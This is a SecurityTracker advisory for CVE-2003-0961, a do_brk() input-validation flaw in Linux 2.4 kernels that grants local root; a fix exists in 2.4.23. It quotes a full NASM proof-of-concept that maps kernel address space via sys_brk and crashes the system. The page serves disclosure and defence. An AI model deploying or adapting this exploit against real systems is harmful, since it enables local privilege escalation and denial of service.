SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   OS (Linux)  >   Linux Kernel Vendors:   kernel.org
(Exploit is Available) Linux 2.4 Kernel do_brk() Input Validation Flaw Lets Local Users Grab Root Privileges
SecurityTracker Alert ID:  1008386
SecurityTracker URL:  http://securitytracker.com/id/1008386
CVE Reference:   CVE-2003-0961   (Links to External Site)
Date:  Dec 4 2003
Impact:   Execution of arbitrary code via local system, Root access via local system
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): 2.4.22 and prior 2.4 kernels
Description:   An input validation vulnerability was reported in the Linux 2.4 kernel. A local user can gain root level privileges.

It is reported that the do_brk() function does not perform proper bounds checking. A local user can run a userland application to cause the kernel to grant the local user access to the full kernel address space.

The userland application can create an arbitrary and large virtual memory area, exceeding user accessible memory limits (TASK_SIZE).

A demonstration exploit is provided in the Source Message.

Impact:   A local user can gain root privileges.
Solution:   A fixed kernel version (2.4.23) is available.
Vendor URL:  www.kernel.org/ (Links to External Site)
Cause:   Input validation error

Message History:   This archive entry is a follow-up to the message listed below.
Dec 1 2003 Linux 2.4 Kernel do_brk() Input Validation Flaw Lets Local Users Grab Root Privileges



 Source Message Contents

Subject:  Linux kernel do_brk(), another proof-of-concept code for i386


--Boundary-00=_PR1z/MYMK4y3QSg
Content-Type: text/plain;
  charset="us-ascii"
Content-Transfer-Encoding: 7bit
Content-Disposition: inline

There were complains that previous POC wasn't working on some kernels, and I 
even saw a guy on IRC asking about POC using a different method.

The previous version was relying on the Linux ELF loader to call do_brk for 
us. This one uses sys_brk(), but to bypass a check of available memory in 
sys_brk we still have to map our code high in memory (but not past 
PAGE_OFFSET this time).

To be able to call sys_brk with success we had to make sure the stack was'nt 
above our program (in most case we have to move it).

Then you can easily crash your system (do a fork(), clone(), execve()...), 
doing something else is'nt trivial :p

Use NASM 0.98.38 or higher to compile.

Julien TINNES

--Boundary-00=_PR1z/MYMK4y3QSg
Content-Type: text/plain;
  charset="us-ascii";
  name="brk_poc_sys_brk.asm"
Content-Transfer-Encoding: 7bit
Content-Disposition: attachment;
	filename="brk_poc_sys_brk.asm"

; Christophe Devine (devine at cr0.net) and Julien Tinnes (julien at cr0.org)
;
; This exploit uses sys_brk directly to expand his break and doesn't rely
; on the ELF loader to do it.
;
; To bypass a check in sys_brk against available memory, we use a high
; virtual address as base address
;
; In most case (let's say when no PaX w/ ASLR :) we have to move the stack
; so that we can expand our break
;


  BITS 32

                org     0xBFFF0000

  ehdr:                                                 ; Elf32_Ehdr
                db      0x7F, "ELF", 1, 1, 1            ;   e_ident
        times 9 db      0
                dw      2                               ;   e_type
                dw      3                               ;   e_machine
                dd      1                               ;   e_version
                dd      _start                          ;   e_entry
                dd      phdr - $$                       ;   e_phoff
                dd      0                               ;   e_shoff
                dd      0                               ;   e_flags
                dw      ehdrsize                        ;   e_ehsize
                dw      phdrsize                        ;   e_phentsize
                dw      2                               ;   e_phnum
                dw      0                               ;   e_shentsize
                dw      0                               ;   e_shnum
                dw      0                               ;   e_shstrndx

  ehdrsize      equ     $ - ehdr

  phdr:                                                 ; Elf32_Phdr
                dd      1                               ;   p_type
                dd      0                               ;   p_offset
                dd      $$                              ;   p_vaddr
                dd      $$                              ;   p_paddr
                dd      filesize                        ;   p_filesz
                dd      filesize                        ;   p_memsz
                dd      7                               ;   p_flags
                dd      0x1000                          ;   p_align

  phdrsize      equ     $ - phdr

  _start:

		; ** Make sure the stack is not above us

                mov     eax, 163         ; mremap
                mov     ebx, esp
		
		and	ebx, ~(0x1000 - 1)	; align to page size

		mov	ecx, 0x1000	; we suppose stack is one page only
                mov     edx, 0x9000	; be sure it can't get mapped after
					; us
                mov     esi,1		; MREMAP_MAYMOVE
                int     0x80


		and	esp, (0x1000 - 1)	; offset in page
		add	esp, eax		; stack ptr to new location
						; nb: we don't fix
						; pointers so environ/cmdline
						; are not available

  		mov	eax,152		; mlockall (for tests as root)
  		mov	ebx,2		; MCL_FUTURE
  		int	0x80

		; get VMAs for the kernel memory

                mov     eax,45          ; brk
                mov     ebx,0xC0500000
		int	0x80

		
		mov	ecx, 4
  loop0:
		
  		mov	eax, 2		; fork
  		int	0x80
		loop	loop0

  _idle:

                mov     eax,162         ; nanosleep
                mov     ebx,timespec
                int     0x80
                jmp     _idle

  timespec      dd      10,0

  filesize      equ     $ - $$


--Boundary-00=_PR1z/MYMK4y3QSg--

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2022, SecurityGlobal.net LLC